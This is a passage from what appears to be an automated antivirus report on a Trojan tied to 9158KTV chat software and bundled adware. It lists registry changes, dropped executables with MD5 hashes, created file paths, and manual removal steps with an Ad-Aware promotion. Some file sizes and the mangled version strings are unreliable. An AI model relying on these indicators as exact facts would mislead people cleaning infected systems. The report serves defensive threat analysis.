[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{1D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\Login9158.Fun.1\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
"(Default)" = "Fun Class"
[HKCR\Login9158.Fun]
"(Default)" = "Fun Class"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Login9158 1.0 Type Library"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
"(Default)" = "Login9158.Fun.1"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
"(Default)" = "Login9158.Fun"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Login9158.Fun\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"
[HKCR\Login9158.Fun\CurVer]
"(Default)" = "Login9158.Fun.1"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IFun"
[HKCR\Login9158.Fun.1]
"(Default)" = "Fun Class"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"
The process 9158.exe:2088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
"(Default)" = "Invoker9158.InvokeChat.1"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
"(Default)" = "Invoker9158.InvokeChat"
[HKCR\ImageOle.GifAnimator.1]
"(Default)" = "GifAnimator Class"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
"(Default)" = "1.0"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
"(Default)" = "ImageOle.GifAnimator"
[HKCR\Login9158.Fun\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"
[HKCR\Login9158.Fun\CurVer]
"(Default)" = "Login9158.Fun.1"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll, 102"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
"(Default)" = "Login9158.Fun"
[HKCR\ImageOle.GifAnimator\CurVer]
"(Default)" = "ImageOle.GifAnimator.1"
[HKCR\Invoker9158.InvokeChat]
"(Default)" = "InvokeChat Class"
[HKCR\Invoker9158.InvokeChat.1]
"(Default)" = "InvokeChat Class"
[HKCR\Login9158.Fun.1\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
"(Default)" = "Login9158.Fun.1"
[HKCR\Invoker9158.InvokeChat.1\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"
[HKCR\ImageOle.GifAnimator]
"(Default)" = "GifAnimator Class"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
"(Default)" = "InvokeChat Class"
[HKCR\ImageOle.GifAnimator\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 30 4F 3C 5C 6B D3 D9 BF 8C B0 B5 F6 48 2F B4"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Invoker9158.InvokeChat\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"
[HKCR\Invoker9158.InvokeChat\CurVer]
"(Default)" = "Invoker9158.InvokeChat.1"
[HKCR\ImageOle.GifAnimator.1\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
"(Default)" = "Fun Class"
[HKCR\Login9158.Fun]
"(Default)" = "Fun Class"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
"(Default)" = "ImageOle.GifAnimator.1"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
"(Default)" = "GifAnimator Class"
[HKCR\Login9158.Fun.1]
"(Default)" = "Fun Class"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Control]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\Programmable]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Programmable]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Insertable]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\Programmable]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
Dropped PE files
MD5 | File path |
---|---|
23b3afde34b252b53e7c1b4a78cb9712 | c:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027 |
ef8154cf33a6ac0dffc02f325acfb7de | c:\Documents and Settings\"%CurrentUserName%"\Application Data\dts\mydts\dts.exe |
91aeea640a17ed03dcfcde1b9096a86f | c:\Documents and Settings\"%CurrentUserName%"\Application Data\dts\mydts\uninst.exe |
50fdadda3e993688401f6f1108fabdb4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl40.tmp\Inetc.dll |
a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl40.tmp\NSISdl.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl40.tmp\System.dll |
05450face243b3a7472407b999b03a72 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl40.tmp\nsProcess.dll |
7b21f6e266e8a4188871804c9810d74a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\MM-liao9906[1].exe |
d7a6bde253e3b614afc203d9ff406855 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\yx_dts[1].exe |
23b3afde34b252b53e7c1b4a78cb9712 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1419052427l238l63518[1].exe |
7b21f6e266e8a4188871804c9810d74a | c:\Program Files\MM-liao8398.exe |
d7a6bde253e3b614afc203d9ff406855 | c:\Program Files\yx_dts.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
yx_dts.exe:1476
%original file name%.exe:1452
notify.exe:2104
9158chat2_ktv083_98.exe:516
assistupdate.exe:2080
dts.exe:1728
dts.exe:1772
OfficeAssist.0419.80.1123.exe:744
OfficeAssist.0419.80.1123.exe:1752
regsvr32.exe:2136
regsvr32.exe:2716
regsvr32.exe:1280
regsvr32.exe:2280
regsvr32.exe:1124
regsvr32.exe:2940
9158.exe:2088
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Desktop\大天使之剑.lnk (944 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe (29256 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\大天使之剑.lnk (922 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw43.tmp (44165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\大天使之剑\卸载大天使之剑.lnk (975 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\大天使之剑\大天使之剑.lnk (956 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (430 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\uninst.exe (11048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CABBAJEH.htm (765 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\icons[1].gif (7 bytes)
C:\temp.icon (1444 bytes)
%Program Files%\9158ktv\DownLoad\9158chat2_ktv083_98.exe.tmp (149051 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xui[1].js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1419052427l238l63518[1].exe (49889 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
C:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027 (108 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\ui_png24.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\js\util\json3.js (8 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\flowcontrol.zip.dt! (148 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\topad.png (4 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\utils.zip.dt! (20716 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\log\notify_2014_12_20.log (6560 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\flowcontrol\flowcontrol.htm (12 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\skin_top.png (6 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\jQuery.js (2392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\ui_con.png (7 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\meihua_mini.zip.dt! (92840 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading24.gif (1 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\bg.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\main.css (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\warning.png (1 bytes)
%WinDir%\Tasks\PPTAssistantNotifyTask_adm.job (392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\Utils.js (6 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading48.gif (1 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading16.gif (455 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\adbgimg.png (2392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\hostapi.js (14 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\js\load.js (8184 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\index.html (7 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading.gif (5 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\Urchin.js (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\moment.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc48.tmp (1080968 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158多人视频\öÃâ€ÃƒËœ 9158多人视频.lnk (505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading2.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading1.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step3.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step2.bmp (22192 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158多人视频\9158多人视频.lnk (681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\custom.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\return.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\finish.bmp (4992 bytes)
%Documents and Settings%\%current user%\Desktop\9158多人视频.lnk (575 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step1.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\System.dll (11 bytes)
%WinDir%\Tasks\PPTAssistantUpdateTask_adm.job (404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\reg2[1].jpg (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[2].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[1].js (2672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[1].js (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\getcard[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[2].js (967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\04190114Mvpaw[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\game1[1].css (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\game1[1].css (4432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\log[1].jpg (6220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\19204027FVrEy[1].jpg (5194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[2].js (3759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\rem_on[1].jpg (807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\wl[1].htm (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[2].js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[1].js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1610242766g2O[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\101215116dbQk[1].jpg (2287 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[1].jpg (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app[1].ini (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\1610242766g2O[1].jpg (2625 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[1].js (680 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\game1[2].css (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[2].jpg (1883 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wl[1].htm (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\client[1].htm (2395 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].jpg (11642 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\game1[1].js (4865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\dot[1].jpg (463 bytes)
%Documents and Settings%\%current user%\Application Data\dts\Upgrade\app.ini (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\18162330BzQOu[1].jpg (2097 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\istat.controller[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.clientclass[1].js (1529 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\MM-liao9906[1].exe (59304 bytes)
%Program Files%\MM-liao8398.exe (59304 bytes)
%Program Files%\2.ico (47632 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\OfficeAssist.0419.80.1123[1].exe (225788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\yx_dts[1].exe (58296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\nsProcess.dll (4 bytes)
%Program Files%\onlines_30863.exe (195990 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Program Files%\1.rar (26 bytes)
%Program Files%\yx_dts.exe (58296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\Inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\onlines_30863[1].exe (195990 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\NSISdl.dll (14 bytes)
%Program Files%\OfficeAssist.0419.80.1123.exe (225788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2[1].ico (47632 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist.dll (8215 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\utility\uninst.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihuappt.pps (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistdownloader.exe (1209 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\product.xml (334 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\103.png (346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\updateself.exe (933 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\30.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\20.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2007.ppsx (300 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\desktoptip.exe (4220 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\assistdownloader.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\101.png (951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_bg.png (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\cfgs\setup.cfg (643 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\notify.exe (2321 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\PPT美化大师\卸载.lnk (994 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\PPT美化大师\PPT美化大师.lnk (910 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist64.dll (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\10.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua.exe (1885 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2007.ppsx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist64.dll (8201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\setup.cfg (643 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\assistupdate.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\104.png (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2010.ppsx (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\desktoptip.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\utility\uninst.exe (5466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2010.ppsx (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_fg.png (182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\3.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\setup.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2003.pps (1810 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihuappt.pps (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\notify.exe (5896 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\102.png (233 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\2.jpg (95 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\100.png (238 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2013.ppsx (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\updateself.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2003.pps (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistupdate.exe (4866 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2013.ppsx (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\FindProcDLL.dll (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\v6svc_oem.dll (5135 bytes)
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\oem.ini (1263 bytes)
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\OfficeAssist.0419.80.1123.exe (128768 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
